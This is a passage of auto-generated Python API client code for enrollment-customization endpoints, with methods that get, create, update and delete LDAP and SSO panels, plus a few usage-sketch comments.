if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_all_panel_id_get`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_all_panel_id_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "GetEnrollmentCustomizationPanel",
404: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/all/{panel-id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
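# Usage sketch (hypothetical ids; assumes the enclosing API class is named
# EnrollmentCustomizationApi):
#
#     api = EnrollmentCustomizationApi(api_client)
#     # Deserialized model only:
#     panel = api.v1_enrollment_customization_id_all_panel_id_get(1, 2)
#     # Model plus HTTP status code and headers:
#     data, status, headers = (
#         api.v1_enrollment_customization_id_all_panel_id_get_with_http_info(
#             1, 2))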
def v1_enrollment_customization_id_ldap_panel_id_delete(self, id, panel_id, **kwargs): # noqa: E501
"""Delete a single LDAP Panel from an Enrollment Customization # noqa: E501
Delete a single LDAP panel from an Enrollment Customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_ldap_panel_id_delete(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_ldap_panel_id_delete_with_http_info(id, panel_id, **kwargs) # noqa: E501
def v1_enrollment_customization_id_ldap_panel_id_delete_with_http_info(self, id, panel_id, **kwargs): # noqa: E501
"""Delete a single LDAP Panel from an Enrollment Customization # noqa: E501
Delete a single LDAP panel from an Enrollment Customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_ldap_panel_id_delete_with_http_info(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without the status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'id',
'panel_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_ldap_panel_id_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_ldap_panel_id_delete`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_ldap_panel_id_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/ldap/{panel-id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_ldap_panel_id_get(self, id, panel_id, **kwargs): # noqa: E501
"""Get a single LDAP panel for a single Enrollment Customization # noqa: E501
Get a single LDAP panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_ldap_panel_id_get(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: GetEnrollmentCustomizationPanelLdapAuth
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_ldap_panel_id_get_with_http_info(id, panel_id, **kwargs) # noqa: E501
def v1_enrollment_customization_id_ldap_panel_id_get_with_http_info(self, id, panel_id, **kwargs): # noqa: E501
"""Get a single LDAP panel for a single Enrollment Customization # noqa: E501
Get a single LDAP panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_ldap_panel_id_get_with_http_info(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without the status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(GetEnrollmentCustomizationPanelLdapAuth, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'panel_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_ldap_panel_id_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_ldap_panel_id_get`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_ldap_panel_id_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "GetEnrollmentCustomizationPanelLdapAuth",
404: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/ldap/{panel-id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_ldap_panel_id_put(self, id, panel_id, enrollment_customization_panel_ldap_auth, **kwargs): # noqa: E501
"""Update a single LDAP Panel for a single Enrollment Customization # noqa: E501
Update a single LDAP panel for a single enrollment customization. If multiple LDAP access groups are defined with the same name and id, only one will be saved. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_ldap_panel_id_put(id, panel_id, enrollment_customization_panel_ldap_auth, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param enrollment_customization_panel_ldap_auth: Enrollment Customization Panel to update (required)
:type enrollment_customization_panel_ldap_auth: EnrollmentCustomizationPanelLdapAuth
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: GetEnrollmentCustomizationPanelLdapAuth
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_ldap_panel_id_put_with_http_info(id, panel_id, enrollment_customization_panel_ldap_auth, **kwargs) # noqa: E501
def v1_enrollment_customization_id_ldap_panel_id_put_with_http_info(self, id, panel_id, enrollment_customization_panel_ldap_auth, **kwargs): # noqa: E501
"""Update a single LDAP Panel for a single Enrollment Customization # noqa: E501
Update a single LDAP panel for a single enrollment customization. If multiple LDAP access groups are defined with the same name and id, only one will be saved. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_ldap_panel_id_put_with_http_info(id, panel_id, enrollment_customization_panel_ldap_auth, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param enrollment_customization_panel_ldap_auth: Enrollment Customization Panel to update (required)
:type enrollment_customization_panel_ldap_auth: EnrollmentCustomizationPanelLdapAuth
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without the status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(GetEnrollmentCustomizationPanelLdapAuth, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'panel_id',
'enrollment_customization_panel_ldap_auth'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_ldap_panel_id_put" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_ldap_panel_id_put`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_ldap_panel_id_put`") # noqa: E501
# verify the required parameter 'enrollment_customization_panel_ldap_auth' is set
if self.api_client.client_side_validation and ('enrollment_customization_panel_ldap_auth' not in local_var_params or # noqa: E501
local_var_params['enrollment_customization_panel_ldap_auth'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `enrollment_customization_panel_ldap_auth` when calling `v1_enrollment_customization_id_ldap_panel_id_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'enrollment_customization_panel_ldap_auth' in local_var_params:
body_params = local_var_params['enrollment_customization_panel_ldap_auth']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "GetEnrollmentCustomizationPanelLdapAuth",
404: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/ldap/{panel-id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
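# Usage sketch (hypothetical ids; assumes the enclosing API class is named
# EnrollmentCustomizationApi). Note the GET returns a
# GetEnrollmentCustomizationPanelLdapAuth while the PUT body is typed as
# EnrollmentCustomizationPanelLdapAuth; whether the fetched model can be
# sent back directly depends on the model definitions, which are not shown
# in this excerpt:
#
#     # Fetch the existing LDAP panel, modify it, then send it back:
#     panel = api.v1_enrollment_customization_id_ldap_panel_id_get(1, 2)
#     updated = api.v1_enrollment_customization_id_ldap_panel_id_put(
#         1, 2, panel)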
def v1_enrollment_customization_id_ldap_post(self, id, enrollment_customization_panel_ldap_auth, **kwargs): # noqa: E501
"""Create an LDAP Panel for a single Enrollment Customization # noqa: E501
Create an LDAP panel for a single enrollment customization. If multiple LDAP access groups are defined with the same name and id, only one will be saved. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_ldap_post(id, enrollment_customization_panel_ldap_auth, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param enrollment_customization_panel_ldap_auth: Enrollment Customization Panel to create (required)
:type enrollment_customization_panel_ldap_auth: EnrollmentCustomizationPanelLdapAuth
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: GetEnrollmentCustomizationPanelLdapAuth
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_ldap_post_with_http_info(id, enrollment_customization_panel_ldap_auth, **kwargs) # noqa: E501
def v1_enrollment_customization_id_ldap_post_with_http_info(self, id, enrollment_customization_panel_ldap_auth, **kwargs): # noqa: E501
"""Create an LDAP Panel for a single Enrollment Customization # noqa: E501
Create an LDAP panel for a single enrollment customization. If multiple LDAP access groups are defined with the same name and id, only one will be saved. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_ldap_post_with_http_info(id, enrollment_customization_panel_ldap_auth, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param enrollment_customization_panel_ldap_auth: Enrollment Customization Panel to create (required)
:type enrollment_customization_panel_ldap_auth: EnrollmentCustomizationPanelLdapAuth
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without the status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(GetEnrollmentCustomizationPanelLdapAuth, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'enrollment_customization_panel_ldap_auth'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_ldap_post" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_ldap_post`") # noqa: E501
# verify the required parameter 'enrollment_customization_panel_ldap_auth' is set
if self.api_client.client_side_validation and ('enrollment_customization_panel_ldap_auth' not in local_var_params or # noqa: E501
local_var_params['enrollment_customization_panel_ldap_auth'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `enrollment_customization_panel_ldap_auth` when calling `v1_enrollment_customization_id_ldap_post`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'enrollment_customization_panel_ldap_auth' in local_var_params:
body_params = local_var_params['enrollment_customization_panel_ldap_auth']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
201: "GetEnrollmentCustomizationPanelLdapAuth",
400: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/ldap', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_sso_panel_id_delete(self, id, panel_id, **kwargs): # noqa: E501
"""Delete a single SSO Panel from an Enrollment Customization # noqa: E501
Delete a single SSO panel from an Enrollment Customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_sso_panel_id_delete(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_sso_panel_id_delete_with_http_info(id, panel_id, **kwargs) # noqa: E501
def v1_enrollment_customization_id_sso_panel_id_delete_with_http_info(self, id, panel_id, **kwargs): # noqa: E501
"""Delete a single SSO Panel from an Enrollment Customization # noqa: E501
Delete a single SSO panel from an Enrollment Customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_sso_panel_id_delete_with_http_info(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without HTTP status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'id',
'panel_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_sso_panel_id_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_sso_panel_id_delete`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_sso_panel_id_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/sso/{panel-id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
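# Usage sketch for the method pairs above (as Python comments, since this is
# generated client source). The `*_with_http_info` variant returns a
# (data, status_code, headers) tuple, while the plain variant returns only the
# deserialized body. The API class and client names below are illustrative
# assumptions about the generated package, not part of this file:
#
#   client = ApiClient(configuration)
#   api = EnrollmentCustomizationApi(client)
#   # Synchronous call; returns None for this DELETE endpoint
#   api.v1_enrollment_customization_id_sso_panel_id_delete(1, 2)
#   # Asynchronous call; returns a thread whose .get() yields the result
#   thread = api.v1_enrollment_customization_id_sso_panel_id_delete(
#       1, 2, async_req=True)
#   thread.get()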
def v1_enrollment_customization_id_sso_panel_id_get(self, id, panel_id, **kwargs): # noqa: E501
"""Get a single SSO Panel for a single Enrollment Customization # noqa: E501
Get a single SSO panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_sso_panel_id_get(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: GetEnrollmentCustomizationPanelSsoAuth
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_sso_panel_id_get_with_http_info(id, panel_id, **kwargs) # noqa: E501
def v1_enrollment_customization_id_sso_panel_id_get_with_http_info(self, id, panel_id, **kwargs): # noqa: E501
"""Get a single SSO Panel for a single Enrollment Customization # noqa: E501
Get a single SSO panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_sso_panel_id_get_with_http_info(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without HTTP status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(GetEnrollmentCustomizationPanelSsoAuth, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'panel_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_sso_panel_id_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_sso_panel_id_get`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_sso_panel_id_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "GetEnrollmentCustomizationPanelSsoAuth",
404: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/sso/{panel-id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_sso_panel_id_put(self, id, panel_id, enrollment_customization_panel_sso_auth, **kwargs): # noqa: E501
"""Update a single SSO Panel for a single Enrollment Customization # noqa: E501
